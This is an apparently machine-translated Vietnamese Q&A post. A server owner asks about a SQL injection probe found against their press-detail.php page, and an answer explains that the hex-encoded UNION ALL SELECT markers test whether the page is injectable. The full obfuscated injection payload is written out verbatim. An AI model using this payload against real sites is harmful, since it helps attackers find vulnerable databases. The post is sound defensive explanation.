Sql injection ai đó có thể giải thích mã này với tôi

Question

Tôi đã được nhìn thấy sql này tiêm/tấn công vào một trong những máy chủ của tôi và muốn biết những gì nó đang cố gắng làm. Tôi biết đó là một cuộc tấn công và sau khi googling nó tôi thấy nó đang được sử dụng rất nhiều nhưng tôi không thấy một lời giải thích về những gì nó làm và những gì hex hoặc nhị phân. Đây là cuộc tấn công

press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1 

Điều tôi muốn biết tại sao "999999.9", "0x39313335313435363237322e39" là gì. Khi cuộc tấn công này làm việc những tin tặc sẽ có hoặc chỉnh sửa những gì họ đã làm cho cơ sở dữ liệu. Cuối cùng cuộc tấn công này có thể chạy hơn và hơn nữa mang xuống/sụp đổ máy chủ?

Bất kỳ giải thích nào về mã này sẽ được đánh giá rất nhiều.

Answer 1

Vì vậy, vì đó là being used a lot, tôi sẽ gửi câu trả lời của mình.

Theo ý kiến ​​của tôi, mục đích của các yêu cầu này là kiểm tra sự hiện diện hoặc vắng mặt của tiêm sql. Đây là một phần của truy vấn mà đang cố gắng bơm:

999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1 

Mục tiêu của những kẻ tấn công là để hoàn thành việc truy vấn theo cách này:

SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" 

Nếu field không vệ sinh, và chỉ khi số lượng cột được sử dụng trong kết quả phù hợp với các cột của truy vấn UNION SELECT, nhiều khả năng sẽ xuất hiện trong chuỗi 91351456272.9 ở đâu đó trong trang.

đó sẽ được các khẳng định cho những kẻ tấn công của một lỗ hổng trong trang.